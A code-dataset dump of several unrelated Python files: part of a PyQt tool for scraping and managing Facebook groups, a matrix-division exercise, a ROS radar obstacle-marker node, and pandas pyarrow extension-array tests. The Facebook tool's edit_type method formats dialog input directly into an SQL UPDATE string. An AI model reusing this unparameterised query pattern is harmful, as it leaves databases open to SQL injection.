self.table_group_view.ui.tableView.selectionModel().selectedRows(COLUMN_GROUP_LINK)\n\n self.group_links = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n\n self._controller.signals.check_group_allow_page.emit(uid, self.group_links)\n def on_scan_approve_post(self):\n uid = self.ui.cb_uids.currentText()\n selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows(3)\n\n self.post_links = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n\n self._controller.signals.check_approval_post.emit(uid, self.post_links)\n\n def filter_notsave(self):\n sql_query = \"DELETE FROM {} WHERE {}.Group_Link IN (SELECT Group_Link FROM groups_tita)\".format(self.active_tb, self.active_tb)\n self.model.setQuery(sql_query)\n if self.model.lastError().isValid():\n logging.error(self.model.lastError().text())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def edit_type(self):\n g_type, ok = QInputDialog.getText(self, \"Edit Type\",\n \"Type:\", QLineEdit.Normal,None)\n if not ok:\n return\n \n sql_query = \"UPDATE {} SET Type='{}' WHERE ID IN ({})\".format(self.active_tb, g_type, \",\".join([str(id) for id in self.seleted_id]))\n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def save_database(self):\n sql_query = \"INSERT INTO groups_tita(Group_Link,Group_Name,Category,Numbers,Details,Type) SELECT Group_Link,Group_Name,Category,Numbers,Details,Type FROM {} WHERE ID IN ({}) AND {}.Group_Link NOT IN (SELECT Group_Link FROM groups_tita)\".format(self.active_tb, \",\".join([str(id) for id in self.seleted_id]), self.active_tb)\n self.model.setQuery(sql_query)\n if self.model.lastError().isValid():\n logging.error(self.model.lastError().text())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select() \n self.refresh_header_size() \n def delete_selected_row(self):\n sql_query = \"DELETE FROM {} WHERE ID IN ({})\".format(self.active_tb, \",\".join([str(id) for id in self.seleted_id]))\n\n # for index in sorted(indexes):\n # mapped_index = self.proxy.mapToSource(index)\n # self.model.removeRow(mapped_index.row())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def scan_groups_by_keyword(self):\n keyword = self.ui.le_key_search.text()\n loop_scan = int(self.ui.number_of_groups.value()/9)\n if not keyword:\n QtWidgets.QMessageBox.critical(None, \"Quét Nhóm\",\"Chọn Từ khoá.\", QtWidgets.QMessageBox.Cancel)\n return\n\n uid = self.ui.cb_uids.currentText()\n self._controller.signals.scan_group_by_keyword.emit(uid, keyword, loop_scan)\n\n def view_posts_table(self):\n self.proxy.clearFilters()\n self.active_tb = 'posts'\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n self.refresh_header_size()\n\n def show_scan_group_by_keyword(self):\n self.proxy.clearFilters()\n uid = self.ui.cb_uids.currentText()\n self.active_tb = 'groups_' + uid\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n \n self.table_group_view.ui.tableView.setModel(self.proxy) \n self.refresh_header_size() \n def show_default_group(self):\n self.proxy.clearFilters()\n self.active_tb = 'groups_tita'\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n self.refresh_header_size()\n\n def eventFilter(self,target,event):\n if target == self.ui.cb_uids and event.type() == QtCore.QEvent.MouseButtonPress:\n self.acc_model = QSqlTableModel(self)\n self.acc_model.setQuery('SELECT * FROM accounts')\n self.ui.cb_uids.setModel(self.acc_model)\n self.ui.cb_uids.setModelColumn(1)\n return False\n \n def refresh(self):\n self.proxy.clearFilters()\n self.active_pageid = ''\n self.model.setTable('groups_' + self.active_pageid)\n status = self.model.select()\n\n # self.proxy = QSortFilterProxyModel()\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n\n # self.proxy_model.setFilterFixedString('Dep')\n # self.proxy_model.setFilterKeyColumn(4)\n\n def on_init(self):\n # index = self.ui.cb_pages.model().index(self.ui.cb_pages.currentIndex(),3)\n # self.activeUID = self.ui.cb_pages.model().data(index)\n\n # page_index = self.ui.cb_pages.model().index(self.ui.cb_pages.currentIndex(),1)\n # self.active_pageid = self.ui.cb_pages.model().data(page_index)\n\n self.proxy = CustomProxyModel()\n self.refresh()\n\n\n def on_view_horizontalHeader_sectionClicked(self, logicalIndex):\n self.logicalIndex = logicalIndex\n #disable specific column menu\n if self.active_tb == 'posts':\n if self.logicalIndex not in [1,4]:\n return\n elif self.active_tb == 'groups_tita':\n if self.logicalIndex not in [3,6,7,11]:\n return\n else:\n if self.logicalIndex not in [3,6,7]:\n return\n\n\n self.menuValues = QtWidgets.QMenu(self)\n self.signalMapper = QtCore.QSignalMapper(self)\n # self.comboBox.blockSignals(True)\n # self.comboBox.setCurrentIndex(self.logicalIndex)\n # self.comboBox.blockSignals(True)\n\n valuesUnique = set([self.model.index(i, logicalIndex).data() for i in range(self.model.rowCount())])\n\n actionAll = QtGui.QAction(\"All\", self)\n actionAll.triggered.connect(self.on_actionAll_triggered)\n self.menuValues.addAction(actionAll)\n self.menuValues.addSeparator()\n for actionNumber, actionName in enumerate(sorted(list(set(valuesUnique)))):\n action = QtGui.QAction(actionName, self)\n self.signalMapper.setMapping(action, actionNumber)\n action.triggered.connect(self.signalMapper.map)\n self.menuValues.addAction(action)\n self.signalMapper.mappedInt.connect(self.on_signalMapper_mapped)\n headerPos = self.table_group_view.ui.tableView.mapToGlobal(self.horizontalHeader.pos())\n posY = headerPos.y() + self.horizontalHeader.height()\n posX = headerPos.x() + self.horizontalHeader.sectionPosition(self.logicalIndex)\n\n self.menuValues.exec_(QtCore.QPoint(posX, posY))\n\n def on_actionAll_triggered(self):\n filterColumn = self.logicalIndex\n self.proxy.setFilter(\"\", filterColumn)\n\n header_label = self.model.record().fieldName(self.logicalIndex)\n self.model.setHeaderData(self.logicalIndex,QtCore.Qt.Horizontal, header_label)\n\n def on_signalMapper_mapped(self, i):\n stringAction = self.signalMapper.mapping(i).text()\n filterColumn = self.logicalIndex\n self.proxy.setFilter(stringAction, filterColumn)\n\n\n header_label = self.model.record().fieldName(self.logicalIndex) + ': ' + stringAction\n self.model.setHeaderData(self.logicalIndex,QtCore.Qt.Horizontal, header_label)\n\n def on_lineEdit_textChanged(self, text):\n self.proxy.setFilter(text, self.proxy.filterKeyColumn())\n\n def on_comboBox_currentIndexChanged(self, index):\n self.proxy.setFilterKeyColumn(index)\n\n\n def refresh_header_size(self):\n # self.horizontalHeader.setSectionResizeMode(1, QHeaderView.ResizeMode.ResizeToContents)\n self.table_group_view.ui.tableView.resizeColumnsToContents()\n if self.active_tb == 'groups_tita':\n self.table_group_view.ui.tableView.setColumnWidth(1,50)\n self.table_group_view.ui.tableView.setColumnWidth(2,200)\n self.table_group_view.ui.tableView.setColumnWidth(5,100)\n elif self.active_tb == ('groups_' + self.ui.cb_uids.currentText()):\n self.table_group_view.ui.tableView.setColumnWidth(1,100)\n self.table_group_view.ui.tableView.setColumnWidth(5,150)\n elif self.active_tb == 'posts': \n self.table_group_view.ui.tableView.setColumnWidth(2,100)\n","repo_name":"wolfwarriorvn/FacebookScrape","sub_path":"views/group_view.py","file_name":"group_view.py","file_ext":"py","file_size_in_byte":16565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74630473708","text":"#!/usr/bin/python3\n\"\"\"Scalar matrix division\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides all elements of matrix by div\n\n Args:\n matrix (list): list of lists of integers or floats\n div (int, float): divisor (must not be 0)\n\n Returns:\n list: new matrix after division\n \"\"\"\n if not isinstance(matrix, list) or\\\n not all(isinstance(row, list) for row in matrix) or\\\n len(matrix) == 0:\n raise TypeError(\"matrix must be a matrix (list of lists) of integers/floats\")\n\n row_len = len(matrix[0])\n if not all(len(row) == row_len for row in matrix):\n raise TypeError(\"Each row of the matrix must have the same size\")\n\n if type(div) not in (int, float):\n raise TypeError(\"div must be a number\")\n\n rmatrix = []\n for row in matrix:\n rrow = []\n for elem in row:\n if type(elem) not in (int, float):\n raise TypeError(\"matrix must be a matrix (list of lists) of integers/floats\")\n rrow.append(round(elem/div, 2))\n rmatrix.append(rrow[:])\n\n return rmatrix\n","repo_name":"utukJ/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44844598078","text":"#!/usr/bin/env python\n\nimport rospy\nimport threading\nimport sensor_msgs.point_cloud2\n\nfrom sensor_msgs.msg import PointCloud2\nfrom nav_msgs.msg import OccupancyGrid, Odometry\nfrom EnvClassifier import GroupingTraker\nfrom datetime import datetime\nfrom visualization_msgs.msg import MarkerArray, Marker\nfrom geometry_msgs.msg import Polygon\nfrom EnvClassifier.ShapeOperator.ClustersToPointCloud2Converter import ClustersToPointCloud2\n\n\nclass PubBlock:\n def __init__(self, thread_handle, event_handle, sub_func, callback_func=None):\n self.thread_handle = thread_handle\n self.event_handle = event_handle\n self.sub_func = sub_func\n self.callback_func = callback_func\n self.data = None\n\n def acquire_data(self):\n self.data = self.sub_func()\n if self.data is None:\n return False\n return True\n\n def update_data(self):\n if self.callback_func is not None:\n self.data = self.callback_func(self.data)\n self.event_handle.clear()\n self.thread_handle.data = self.data\n self.event_handle.set()\n rospy.loginfo(\"Pub \" + self.thread_handle.thread_name)\n\n\nclass SubThread(threading.Thread):\n def __init__(self, thread_name=\"SubThread\", duration=60.0):\n super(SubThread, self).__init__(name=thread_name)\n self.thread_name = thread_name\n self.duration = duration\n self._pub_blocks = {}\n\n def register_thread_CB(self, pub_block):\n self._pub_blocks[pub_block.thread_handle.thread_name] = pub_block\n\n def run(self):\n rospy.loginfo(\"Start sub thread: \" + self.thread_name)\n while not rospy.is_shutdown():\n for pub_block in self._pub_blocks.values():\n if not pub_block.thread_handle.isAlive():\n pub_block.thread_handle.start()\n if pub_block.acquire_data():\n pub_block.update_data()\n else:\n continue\n # Sleep every interval\n rospy.sleep(self.duration)\n\n\nclass Distributer:\n def __init__(self, publisher, call_back):\n self.publisher = publisher\n self.call_back = call_back\n\n def deal_and_pub(self, data):\n res = self.call_back(data)\n if isinstance(res, MarkerArray):\n for mark in res:\n mark.action = Marker.DELETE\n self.publisher.publish(res)\n for mark in res:\n mark.action = Marker.ADD\n self.publisher.publish(res)\n\n\nclass PubThread(threading.Thread):\n def __init__(self, thread_name, pub_event, pub_rate=3):\n super(PubThread, self).__init__(name=thread_name)\n self.thread_name = thread_name\n self.data = None\n self.pub_event = pub_event\n self.pub_rate = pub_rate\n self.distributers = []\n\n def register_distributer(self, distributer):\n self.distributers.append(distributer)\n\n def run(self):\n rospy.loginfo(\"Start pub thread: \" + self.thread_name)\n while not rospy.is_shutdown():\n while self.pub_event.is_set():\n if rospy.is_shutdown():\n break\n if self.data is not None: # (env, lcs, mcs)\n # rospy.loginfo(\"Pub \" + self.thread_name)\n for distributer in self.distributers:\n distributer.deal_and_pub(self.data)\n rospy.sleep(10.0)\n else:\n rospy.loginfo(\"Nothing to Pub \" + self.thread_name)\n\n\ndef pc2_grid_sub_func():\n # Get point data\n global group_tracker\n data = rospy.wait_for_message('/filtered_point_cloud_centers', PointCloud2, timeout=None)\n laser_grid = rospy.wait_for_message('/map', OccupancyGrid, timeout=None)\n point_cloud2 = sensor_msgs.point_cloud2.read_points(data)\n points = [[i[0], i[1], i[2]] for i in point_cloud2]\n # Generate points and marks\n if points is not None and len(points) > 0:\n return group_tracker.getEnv(points, laser_grid)\n else:\n rospy.loginfo(\"No enough points for classification\")\n return None\n\ndef get_marker_array_callback(data):\n rospy.loginfo(\"Updating obstacle infos.\")\n return data[0].generateInfoMarkers()\n\ndef get_polygon_array_callback(data):\n rospy.loginfo(\"Updating obstacle polygons.\")\n return data[0].generateShapeMarkers()\n\ndef get_transparent_obstacle_callback(data):\n rospy.loginfo(\"Updating transparent obstacles.\")\n return data[0].generateTransparentObstacleMarkers()\n\ndef get_clustered_mmwave_pointcloud2_callback(data):\n rospy.loginfo(\"Updating clustered transparent mmwave clusters.\")\n mcs = data[2]\n return ClustersToPointCloud2(mcs)\n\n\nif __name__ == '__main__':\n # Pub components\n marker_array_pub = rospy.Publisher(\"/class_marker\", MarkerArray, queue_size=1)\n polygon_array_pub = rospy.Publisher(\"/polygon_marker\", MarkerArray, queue_size=100)\n transparent_obstacle_pub = rospy.Publisher(\"/transparent_obstacle\", Polygon, queue_size=1)\n # clustered_mmwave_pub = rospy.Publisher(\"/clustered_mmwave\", PointCloud2, queue_size=1)\n\n marker_distributer = Distributer(marker_array_pub, get_marker_array_callback)\n polygon_distributer = Distributer(polygon_array_pub, get_polygon_array_callback)\n transparent_obstacle_distributer = Distributer(transparent_obstacle_pub, get_transparent_obstacle_callback)\n # clustered_mmwave_distributer = Distributer(clustered_mmwave_pub, get_clustered_mmwave_pointcloud2_callback)\n\n pub_event = threading.Event()\n pub_thread = PubThread(\"PubMarkerArray\", pub_event)\n pub_thread.register_distributer(marker_distributer)\n pub_thread.register_distributer(polygon_distributer)\n pub_thread.register_distributer(transparent_obstacle_distributer)\n # pub_thread.register_distributer(clustered_mmwave_distributer)\n marker_pub_block = PubBlock(pub_thread, pub_event, pc2_grid_sub_func)\n\n pc2_sub_thread = SubThread(\"SubPC2\", duration=10.0)\n pc2_sub_thread.register_thread_CB(marker_pub_block)\n try:\n rospy.init_node('map_classifier', anonymous=True)\n group_tracker = GroupingTraker.GroupingTracker()\n pc2_sub_thread.start()\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"908941087/mmwave_radar_indoor_false","sub_path":"ti_ws/src/py_interface/scripts/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4118035898","text":"\"\"\"\nThis file contains a minimal set of tests for compliance with the extension\narray interface test suite, and should contain no other tests.\nThe test suite for the full functionality of the array is located in\n`pandas/tests/arrays/`.\nThe tests in this file are inherited from the BaseExtensionTests, and only\nminimal tweaks should be applied to get the tests passing (by overwriting a\nparent method).\nAdditional tests should either be added to one of the BaseExtensionTests\nclasses (if they are relevant for the extension interface for all dtypes), or\nbe added to the array-specific tests in `pandas/tests/arrays/`.\n\"\"\"\nfrom datetime import (\n date,\n datetime,\n time,\n timedelta,\n)\nfrom io import (\n BytesIO,\n StringIO,\n)\nimport pickle\n\nimport numpy as np\nimport pytest\n\nfrom pandas.compat import (\n is_ci_environment,\n is_platform_windows,\n pa_version_under6p0,\n pa_version_under7p0,\n pa_version_under8p0,\n pa_version_under9p0,\n)\nfrom pandas.errors import PerformanceWarning\n\nimport pandas as pd\nimport pandas._testing as tm\nfrom pandas.api.types import is_bool_dtype\nfrom pandas.tests.extension import base\n\npa = pytest.importorskip(\"pyarrow\", minversion=\"1.0.1\")\n\nfrom pandas.core.arrays.arrow.array import ArrowExtensionArray\n\nfrom pandas.core.arrays.arrow.dtype import ArrowDtype # isort:skip\n\npytestmark = pytest.mark.filterwarnings(\n \"ignore:.* may decrease performance. Upgrade to pyarrow >=7 to possibly\"\n)\n\n\n@pytest.fixture(params=tm.ALL_PYARROW_DTYPES, ids=str)\ndef dtype(request):\n return ArrowDtype(pyarrow_dtype=request.param)\n\n\n@pytest.fixture\ndef data(dtype):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n data = [True, False] * 4 + [None] + [True, False] * 44 + [None] + [True, False]\n elif pa.types.is_floating(pa_dtype):\n data = [1.0, 0.0] * 4 + [None] + [-2.0, -1.0] * 44 + [None] + [0.5, 99.5]\n elif pa.types.is_signed_integer(pa_dtype):\n data = [1, 0] * 4 + [None] + [-2, -1] * 44 + [None] + [1, 99]\n elif pa.types.is_unsigned_integer(pa_dtype):\n data = [1, 0] * 4 + [None] + [2, 1] * 44 + [None] + [1, 99]\n elif pa.types.is_date(pa_dtype):\n data = (\n [date(2022, 1, 1), date(1999, 12, 31)] * 4\n + [None]\n + [date(2022, 1, 1), date(2022, 1, 1)] * 44\n + [None]\n + [date(1999, 12, 31), date(1999, 12, 31)]\n )\n elif pa.types.is_timestamp(pa_dtype):\n data = (\n [datetime(2020, 1, 1, 1, 1, 1, 1), datetime(1999, 1, 1, 1, 1, 1, 1)] * 4\n + [None]\n + [datetime(2020, 1, 1, 1), datetime(1999, 1, 1, 1)] * 44\n + [None]\n + [datetime(2020, 1, 1), datetime(1999, 1, 1)]\n )\n elif pa.types.is_duration(pa_dtype):\n data = (\n [timedelta(1), timedelta(1, 1)] * 4\n + [None]\n + [timedelta(-1), timedelta(0)] * 44\n + [None]\n + [timedelta(-10), timedelta(10)]\n )\n elif pa.types.is_time(pa_dtype):\n data = (\n [time(12, 0), time(0, 12)] * 4\n + [None]\n + [time(0, 0), time(1, 1)] * 44\n + [None]\n + [time(0, 5), time(5, 0)]\n )\n elif pa.types.is_string(pa_dtype):\n data = [\"a\", \"b\"] * 4 + [None] + [\"1\", \"2\"] * 44 + [None] + [\"!\", \">\"]\n elif pa.types.is_binary(pa_dtype):\n data = [b\"a\", b\"b\"] * 4 + [None] + [b\"1\", b\"2\"] * 44 + [None] + [b\"!\", b\">\"]\n else:\n raise NotImplementedError\n return pd.array(data, dtype=dtype)\n\n\n@pytest.fixture\ndef data_missing(data):\n \"\"\"Length-2 array with [NA, Valid]\"\"\"\n return type(data)._from_sequence([None, data[0]])\n\n\n@pytest.fixture(params=[\"data\", \"data_missing\"])\ndef all_data(request, data, data_missing):\n \"\"\"Parametrized fixture returning 'data' or 'data_missing' integer arrays.\n\n Used to test dtype conversion with and without missing values.\n \"\"\"\n if request.param == \"data\":\n return data\n elif request.param == \"data_missing\":\n return data_missing\n\n\n@pytest.fixture\ndef data_for_grouping(dtype):\n \"\"\"\n Data for factorization, grouping, and unique tests.\n\n Expected to be like [B, B, NA, NA, A, A, B, C]\n\n Where A < B < C and NA is missing\n \"\"\"\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n A = False\n B = True\n C = True\n elif pa.types.is_floating(pa_dtype):\n A = -1.1\n B = 0.0\n C = 1.1\n elif pa.types.is_signed_integer(pa_dtype):\n A = -1\n B = 0\n C = 1\n elif pa.types.is_unsigned_integer(pa_dtype):\n A = 0\n B = 1\n C = 10\n elif pa.types.is_date(pa_dtype):\n A = date(1999, 12, 31)\n B = date(2010, 1, 1)\n C = date(2022, 1, 1)\n elif pa.types.is_timestamp(pa_dtype):\n A = datetime(1999, 1, 1, 1, 1, 1, 1)\n B = datetime(2020, 1, 1)\n C = datetime(2020, 1, 1, 1)\n elif pa.types.is_duration(pa_dtype):\n A = timedelta(-1)\n B = timedelta(0)\n C = timedelta(1, 4)\n elif pa.types.is_time(pa_dtype):\n A = time(0, 0)\n B = time(0, 12)\n C = time(12, 12)\n elif pa.types.is_string(pa_dtype):\n A = \"a\"\n B = \"b\"\n C = \"c\"\n elif pa.types.is_binary(pa_dtype):\n A = b\"a\"\n B = b\"b\"\n C = b\"c\"\n else:\n raise NotImplementedError\n return pd.array([B, B, None, None, A, A, B, C], dtype=dtype)\n\n\n@pytest.fixture\ndef data_for_sorting(data_for_grouping):\n \"\"\"\n Length-3 array with a known sort order.\n\n This should be three items [B, C, A] with\n A < B < C\n \"\"\"\n return type(data_for_grouping)._from_sequence(\n [data_for_grouping[0], data_for_grouping[7], data_for_grouping[4]]\n )\n\n\n@pytest.fixture\ndef data_missing_for_sorting(data_for_grouping):\n \"\"\"\n Length-3 array with a known sort order.\n\n This should be three items [B, NA, A] with\n A < B and NA missing.\n \"\"\"\n return type(data_for_grouping)._from_sequence(\n [data_for_grouping[0], data_for_grouping[2], data_for_grouping[4]]\n )\n\n\n@pytest.fixture\ndef data_for_twos(data):\n \"\"\"Length-100 array in which all the elements are two.\"\"\"\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n return pd.array([2] * 100, dtype=data.dtype)\n # tests will be xfailed where 2 is not a valid scalar for pa_dtype\n return data\n\n\n@pytest.fixture\ndef na_value():\n \"\"\"The scalar missing value for this type. Default 'None'\"\"\"\n return pd.NA\n\n\nclass TestBaseCasting(base.BaseCastingTests):\n def test_astype_str(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_binary(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"For {pa_dtype} .astype(str) decodes.\",\n )\n )\n super().test_astype_str(data)\n\n\nclass TestConstructors(base.BaseConstructorsTests):\n def test_from_dtype(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if (pa.types.is_timestamp(pa_dtype) and pa_dtype.tz) or pa.types.is_string(\n pa_dtype\n ):\n if pa.types.is_string(pa_dtype):\n reason = \"ArrowDtype(pa.string()) != StringDtype('pyarrow')\"\n else:\n reason = f\"pyarrow.type_for_alias cannot infer {pa_dtype}\"\n request.node.add_marker(\n pytest.mark.xfail(\n reason=reason,\n )\n )\n super().test_from_dtype(data)\n\n def test_from_sequence_pa_array(self, data, request):\n # https://github.com/pandas-dev/pandas/pull/47034#discussion_r955500784\n # data._data = pa.ChunkedArray\n result = type(data)._from_sequence(data._data)\n tm.assert_extension_array_equal(result, data)\n assert isinstance(result._data, pa.ChunkedArray)\n\n result = type(data)._from_sequence(data._data.combine_chunks())\n tm.assert_extension_array_equal(result, data)\n assert isinstance(result._data, pa.ChunkedArray)\n\n def test_from_sequence_pa_array_notimplemented(self, request):\n if pa_version_under6p0:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=AttributeError,\n reason=\"month_day_nano_interval not implemented by pyarrow.\",\n )\n )\n with pytest.raises(NotImplementedError, match=\"Converting strings to\"):\n ArrowExtensionArray._from_sequence_of_strings(\n [\"12-1\"], dtype=pa.month_day_nano_interval()\n )\n\n def test_from_sequence_of_strings_pa_array(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_time64(pa_dtype) and pa_dtype.equals(\"time64[ns]\"):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"Nanosecond time parsing not supported.\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support parsing {pa_dtype}\",\n )\n )\n elif pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"Iterating over ChunkedArray[bool] returns PyArrow scalars.\",\n )\n )\n elif pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n if pa_version_under7p0:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support string cast from {pa_dtype}\",\n )\n )\n elif is_platform_windows() and is_ci_environment():\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n \"TODO: Set ARROW_TIMEZONE_DATABASE environment variable \"\n \"on CI to path to the tzdata for pyarrow.\"\n ),\n )\n )\n elif pa_version_under6p0 and pa.types.is_temporal(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support string cast from {pa_dtype}\",\n )\n )\n pa_array = data._data.cast(pa.string())\n result = type(data)._from_sequence_of_strings(pa_array, dtype=data.dtype)\n tm.assert_extension_array_equal(result, data)\n\n pa_array = pa_array.combine_chunks()\n result = type(data)._from_sequence_of_strings(pa_array, dtype=data.dtype)\n tm.assert_extension_array_equal(result, data)\n\n\nclass TestGetitemTests(base.BaseGetitemTests):\n @pytest.mark.xfail(\n reason=(\n \"data.dtype.type return pyarrow.DataType \"\n \"but this (intentionally) returns \"\n \"Python scalars or pd.NA\"\n )\n )\n def test_getitem_scalar(self, data):\n super().test_getitem_scalar(data)\n\n\nclass TestBaseNumericReduce(base.BaseNumericReduceTests):\n def check_reduce(self, ser, op_name, skipna):\n pa_dtype = ser.dtype.pyarrow_dtype\n result = getattr(ser, op_name)(skipna=skipna)\n if pa.types.is_boolean(pa_dtype):\n # Can't convert if ser contains NA\n pytest.skip(\n \"pandas boolean data with NA does not fully support all reductions\"\n )\n elif pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n ser = ser.astype(\"Float64\")\n expected = getattr(ser, op_name)(skipna=skipna)\n tm.assert_almost_equal(result, expected)\n\n @pytest.mark.parametrize(\"skipna\", [True, False])\n def test_reduce_series(self, data, all_numeric_reductions, skipna, request):\n pa_dtype = data.dtype.pyarrow_dtype\n xfail_mark = pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_numeric_reductions} is not implemented in \"\n f\"pyarrow={pa.__version__} for {pa_dtype}\"\n ),\n )\n if all_numeric_reductions in {\"skew\", \"kurt\"}:\n request.node.add_marker(xfail_mark)\n elif (\n all_numeric_reductions in {\"median\", \"var\", \"std\", \"prod\", \"max\", \"min\"}\n and pa_version_under6p0\n ):\n request.node.add_marker(xfail_mark)\n elif (\n all_numeric_reductions in {\"sum\", \"mean\"}\n and skipna is False\n and pa_version_under6p0\n and (pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype))\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=AssertionError,\n reason=(\n f\"{all_numeric_reductions} with skip_nulls={skipna} did not \"\n f\"return NA for {pa_dtype} with pyarrow={pa.__version__}\"\n ),\n )\n )\n elif not (\n pa.types.is_integer(pa_dtype)\n or pa.types.is_floating(pa_dtype)\n or pa.types.is_boolean(pa_dtype)\n ) and not (\n all_numeric_reductions in {\"min\", \"max\"}\n and (\n (pa.types.is_temporal(pa_dtype) and not pa.types.is_duration(pa_dtype))\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n )\n ):\n request.node.add_marker(xfail_mark)\n elif pa.types.is_boolean(pa_dtype) and all_numeric_reductions in {\n \"std\",\n \"var\",\n \"median\",\n }:\n request.node.add_marker(xfail_mark)\n super().test_reduce_series(data, all_numeric_reductions, skipna)\n\n\nclass TestBaseBooleanReduce(base.BaseBooleanReduceTests):\n @pytest.mark.parametrize(\"skipna\", [True, False])\n def test_reduce_series(\n self, data, all_boolean_reductions, skipna, na_value, request\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n xfail_mark = pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_boolean_reductions} is not implemented in \"\n f\"pyarrow={pa.__version__} for {pa_dtype}\"\n ),\n )\n if not pa.types.is_boolean(pa_dtype):\n request.node.add_marker(xfail_mark)\n op_name = all_boolean_reductions\n s = pd.Series(data)\n result = getattr(s, op_name)(skipna=skipna)\n assert result is (op_name == \"any\")\n\n\nclass TestBaseGroupby(base.BaseGroupbyTests):\n def test_groupby_agg_extension(self, data_for_grouping, request):\n super().test_groupby_agg_extension(data_for_grouping)\n\n def test_groupby_extension_no_sort(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n super().test_groupby_extension_no_sort(data_for_grouping)\n\n def test_groupby_extension_transform(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_groupby_extension_transform(data_for_grouping)\n\n def test_groupby_extension_apply(\n self, data_for_grouping, groupby_apply_op, request\n ):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_groupby_extension_apply(data_for_grouping, groupby_apply_op)\n\n def test_in_numeric_groupby(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"ArrowExtensionArray doesn't support .sum() 